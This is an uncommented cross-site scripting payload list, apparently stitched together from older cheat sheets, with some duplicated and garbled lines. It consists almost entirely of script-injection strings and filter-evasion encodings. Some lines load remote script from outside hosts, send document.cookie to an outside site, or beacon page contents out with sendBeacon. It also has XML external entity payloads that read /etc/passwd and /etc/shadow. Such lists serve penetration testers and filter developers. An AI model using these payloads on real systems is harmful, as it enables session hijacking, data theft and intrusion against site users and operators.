<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>;
REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</
style>
<OBJECT TYPE="text/x-scriptlet"
DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss"
implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT
SRC="http://www.securitycompass.com/xss.js"></script>
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;/script>;<;script>;alert(1)<;/script>;
<;/br style=a:expression(alert())>;
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<;br size=\";&;{alert('XSS')}\";>;
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?
sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%2
3x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful
%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:a
le&<WBR>#114;t('XS<WBR>;S')>
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099r�
00105&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114&#
0000116(&<WBR>#0000039XS&<WBR>#0000083')>
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61l&#
x65rt(&<WBR>#x27XSS')>
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<!
[CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<script>alert('XSS')</script>
%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=javascrip
t:alert('�
00088SS')>
<IMG
SRC=javascript:alert&
#x28'XSS')>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";al
ert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
<scrip
t>aler
t(123)
;</
script
>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(‘XSS’)>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/
onerror='eval(src)'>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 
;>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/
***/</script /***/
<a href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a>
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/
type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script
//|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</
style>
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)
{Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<iframe
src=j
	a
		v
			a
	&T
ab;		s
					c
				&Ta
b;	r
							i
			&Tab
;				p
									t&New
Line;										:a
	&Tab
;									l
					
							e
							&
Tab;					r
								&T
ab;					t
								&Ta
b;						28
							&Ta
b;								1
					&Tab
;											%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e&Ta
b;r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"
allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></
script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<svg><script>//
confirm(1);</script </svg>
<div/onmouseover='alert(1)'> style="x:">
<script/src=data:text/javascri�
0070t,alert(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C
%2F%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src&#
61"http://sternefa

9ily.net/foo.js"><&
#47script>​">Click Me</a>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”
;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav	ascript:alert(‘XSS’);”>
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<IMG
SRC=javascript:al

1;rt('XSS')>
<IMG
SRC=javascri�
0112t:alert(�
0039XSS')>
<IMG
SRC=javascript:aler&#
x74('XSS')>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<IMG SRC=”javascript:alert(‘XSS’)”
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert("XSS")>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))
//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))
//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//
--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/
SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox
worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?
8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?
(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-
frmGoogleWeb=Web+Search
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<div style="font-family:'foo ;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/
color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></
LAYER>
<LINK REL=\"stylesheet\"
HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css>;
REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/
xssmoz.xml#xss\")}</STYLE>
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
K\">
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-
image:url(\"javascript:alert('XSS')\");}</STYLE><A
CLASS=XSS></A>
<STYLE
type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}&l
t;/STYLE>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<XML ID=I><X><C><![CDATA[<IMG
SRC=\"javas]]><!
[CDATA[cript:alert('XSS');\">]]>
<HTML><BODY>
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<SCRIPT a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>`
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</
A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A
HREF=\"javascript:document.location='http://www.google.com/'
\">XSS</A>
<A
HREF=\"http://www.gohttp://www.google.com/ogle.com/\">
XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG
SRC=javascript:aler&#
x74('XSS')>
<IMG
SRC=javascri�
0112t:alert(�
0039XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,8
3,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCha
rCode(88,83,83))//--></
SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//
--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{alert(123)}),x</script>
<script>Object.__noSuchMethod__ =
Function,[{}][0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-
use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://
my.box.com/xss.js%3E%3C/script%3E%22)’%3E
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
<BODY ONLOAD=alert(’XSS’)>
<script>alert(1)</script>
Compatibility:
onafterprint
Fires after the page is printed
<body onafterprint=alert(1)>
Compatibility:
onafterscriptexecute
Fires after script is executed
<xss
onafterscriptexecute=alert(1)><script>1</script>
Compatibility:
onanimationcancel
Fires when a CSS animation cancels
<style>@keyframes
x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x
style="position:absolute;" onanimationcancel="alert(1)"></xss>
Compatibility:
onanimationend
Fires when a CSS animation ends
<style>@keyframes
x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
Compatibility:
onanimationiteration
Fires when a CSS animation repeats
<style>@keyframes
slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-
count:2" onanimationiteration="alert(1)"></xss>
Compatibility:
onanimationstart
Fires when a CSS animation starts
<style>@keyframes
x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
Compatibility:
onbeforeactivate
Fires before the element is activated
Compatibility:
onbeforedeactivate
Fires before the element is deactivated
Compatibility:
onbeforeprint
Fires before the page is printed
<body onbeforeprint=alert(1)>
Compatibility:
onbeforescriptexecute
Fires before script is executed
<xss
onbeforescriptexecute=alert(1)><script>1</script>
Compatibility:
onbeforeunload
Fires after if the url changes
<body
onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>
Compatibility:
onbegin
Fires when a svg animation begins
<svg><animate onbegin=alert(1)
attributeName=x dur=1s>
Compatibility:
onblur
Fires when an element loses focus
<a onblur=alert(1)
tabindex=1 id=x></a><input autofocus>
Compatibility:
onbounce
Fires when the marquee bounces
Compatibility:
oncanplay
Fires if the resource can be played
Compatibility:
oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through
<video
oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
Compatibility:
oncuechange
Fires when subtitle changes
<video controls><source
src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1)
src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
Compatibility:
ondeactivate
Fires when the element is deactivated
Compatibility:
ondurationchange
Fires when duration changes
onend
Fires when a svg animation ends
